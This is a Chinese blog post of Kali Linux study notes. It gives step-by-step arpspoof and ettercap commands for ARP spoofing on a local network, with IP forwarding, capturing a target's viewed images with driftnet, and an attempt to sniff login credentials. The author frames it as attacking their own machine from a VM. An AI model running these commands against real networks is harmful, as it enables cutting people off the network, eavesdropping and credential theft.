kail-linux 安全之旅
一些学习网站
http://xiao106347.blog.163.com/blog/static/2159920782013111995945233/ http://xiao106347.blog.163.com/blog/static/21599207820146302851904/ http://xiao106347.blog.163.com/blog/static/215992078201352055231824/
下载系统:http://www.cnblogs.com/CyLee/p/5726521.html
终端输入armitage,然后一直确认即可
出现异常尝试如下几个步骤
1、命令行输入service postgresql start(或者/etc/init.d/postgresql start)
2、找到图形界面把metasploit framework打开,会自动创建数据库,自动连接(或者尝试msfdb start + msfconsole,反正我是没用)
3、再次使用armitage
arpspoof攻击局域网(虚拟机攻击本机)
注意,必须将虚拟机网络设置为【桥接模式】
arpspoof -i 【我的网卡】 -t 【攻击目标ip】 【攻击目标默认网关】
【我的网卡】:虚拟机中打开终端,输入ifconfig查看,通常都是eth0;
【攻击目标ip】:本机中打开终端,输入ifconfg查看,我的是192.168.1.101,我是通过打开【网络适配器】查看的
【攻击目标默认网关ip】:本机中打开终端,输入ifconfg查看,通常是192.168.1.1,我是通过打开【网络适配器->高级->tcp/ip】查看的
然后在虚拟机输入此demo:
arpspoof -i eth0 -t 192.168.1.101 192.168.1.1
这样本机就无法访问网络了。按ctrl+c结束
获取局域网内攻击目标的图片
echo 1 >/proc/sys/net/ipv4/ip_forward #默认是0,通过这行修改为1,这种方式叫【ip转发】此时不会有断网现象了
arpspoof -i eth0 -t 192.168.1.101 192.168.1.1 #这种方式叫【arp欺骗】
ettercap -i eth0 -Tq -M arp:remote /192.168.1.103// /192.168.1.1// #【arp欺骗】,如果上面的欺骗+截取没有效果,可以尝试使用这个
另开一个终端,使用如下命令截取图片流量。然后目标电脑打开任何带图片的网站如QQ空间
driftnet -i eth0 #浏览图片截取(本人MAC系统以及MAC系统上的虚拟机都无法使用该功能)
(ps:可以通过arp -a 来获取欺骗的成果,如果发现两个类型为【动态】的ip分别为目标和网关即可,mac电脑暂时无法看出是否被欺骗)
获取局域网内攻击目标的登录信息
也需要先arp欺骗+ip转发
ettercap -Tq -i eth0 #登录账号密码截取(暂时无法实现)
kail-linux 安全之旅的更多相关文章
- kail linux 虚拟机安装实录(一) 新建虚拟机
各位晚上好. 现在开始进行kail linux 在虚拟机上的安装. 我所使用的工具如下: kail linux 2.0 x64 http://mirrors.neusoft.edu.cn/kal ...
- 【Linux探索之旅】第二部分第二课:命令行,世界尽在掌握
内容简介 1.第二部分第二课:命令行,世界尽在掌握 2.第二部分第三课预告:文件和目录,组织不会亏待你 命令行,世界尽在掌握 今天的标题是不是有点霸气侧漏呢? 读者:“小编,你为什么每次都要起这么非主 ...
- 【Linux探索之旅】第一部分第五课:Unity桌面,人生若只如初见
内容简介 1.第一部分第五课:Unity桌面,人生若只如初见 2.第一部分第六课预告:Linux如何安装在虚拟机中 Unity桌面,人生若只如初见 不容易啊,经过了前几课的学习,我们认识了Linux是 ...
- 【Linux探索之旅】第二部分第五课:用户和权限,有权就任性
内容简单介绍 .第二部分第五课:用户和权限,有权就任性 2.第二部分第六课预告:Nano,刚開始学习的人的文本编辑器 用户和权限.有权就任性 今天的标题也挺任性的啊,虽说小编是一个非常本分的人(真的吗 ...
- Kail Linux的安装方法
众所周知,kail 是一个基于Debian的Linux发行版,它的目标就是为了在一个实用的工具包里尽可能多的包含渗透和审计工具 kail就实现了这个目标,里面包含有很多关于安全测试的开源工具,如果现在 ...
- kail linux虚拟机安装tools工具
因为自己比较懒,有时候自己不想打字需要粘贴就安装了虚拟机tools工具,又因为自己脑子不好使所以就写一下步骤,以便以后用得着.我这里用得是kail linux系统,不知道contest能不能这样安,下 ...
- 虚拟机14安装kail Linux
需要准备虚拟机和kail Linux镜像 1. 2.选择镜像安装,并且添加你的kail Linux镜像文件. 3. 4.在这里需要修改虚拟机名称,也可以不修改就用默认,然后在修改kail Linux的 ...
- MOOC Linux内核之旅小结【转】
转自:https://blog.csdn.net/titer1/article/details/45345123 版权声明:本文为博主原创文章,未经博主允许不得转载. https://blog.csd ...
- Linux内核之旅
http://www.kerneltravel.net/ Linux内核之旅 Linux Kernel Travel
- kail linux 系统下利用metaspolit工具渗透win7电脑
注:只是测试,不可干违法的事. 一.metaspolit工具的介绍 1.1.metaspolit 是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新.被安全社区冠以“可以黑掉整个宇 ...
随机推荐
- mysql 基于lvm快照的备份
1.查看磁盘数 ls /dev/ | grep sd 2.快照备份 pvcreate /dev/sdb #制作成物理卷vgcreate testvg /dev/sdblvcreate -L200M - ...
- ACdream 1195 Sudoku Checker (数独)
Sudoku Checker Time Limit:1000MS Memory Limit:64000KB 64bit IO Format:%lld & %llu Submit ...
- [Android Pro] Android fastboot刷机和获取Root权限
参考文章: https://developers.google.com/android/nexus/images 转载自: http://www.inexus.co/article-1280-1 ...
- ubuntu maven环境安装配置
转载地址:http://my.oschina.net/hongdengyan/blog/150472#OSC_h1_4 一.环境说明: 操作系统:Ubuntu 12.04.2 LTS maven:ap ...
- July 15th, Week 29th Friday, 2016
A book is a gift that you can open again and again. 书是你可以一次又一次打开的礼物. Some gifts are born with you, a ...
- 火车站(codevs 2287)
题目描述 Description 火车从始发站(称为第1站)开出,在始发站上车的人数为a,然后到达第2站,在第2站有人上.下车,但上.下车的人数相同,因此在第2站开出时(即在到达第3站之前)车上的人数 ...
- Zookeeper笔记(四)Zookeeper在Dubbo中的应用
Zookeeper在Dubbo中的应用 Dubbo的架构 节点角色说明: Provider: 暴露服务的服务提供方.Consumer: 调用远程服务的服务消费方.Registry: 服务注册与发现的注 ...
- 如何清除sql server日志
1.打开查询分析器,输入命令 DUMP TRANSACTION 数据库名 WITH NO_LOG 2.再打开企业管理器--右键你要压缩的数据库--所有任务--收缩数据库--收缩文件--选择日志文件-- ...
- hadoop本地库无法加载
(1)设置环境变量 export HADOOP_HOME=/your/own/hadoop/home export HADOOP_COMMON_LIB_NATIVE_DIR=$HADOOP_HOME ...
- 字符编码GB2312、GBK、UTF-8的区别
本文来自:javaeye网站 UTF8是国际编码,它的通用性比较好,外国人也可以浏览论坛 GBK是国家编码,通用性比UTF8差,不过UTF8占用的数据库比GBK大~ 提示:如果您的网站客户群体主要是面 ...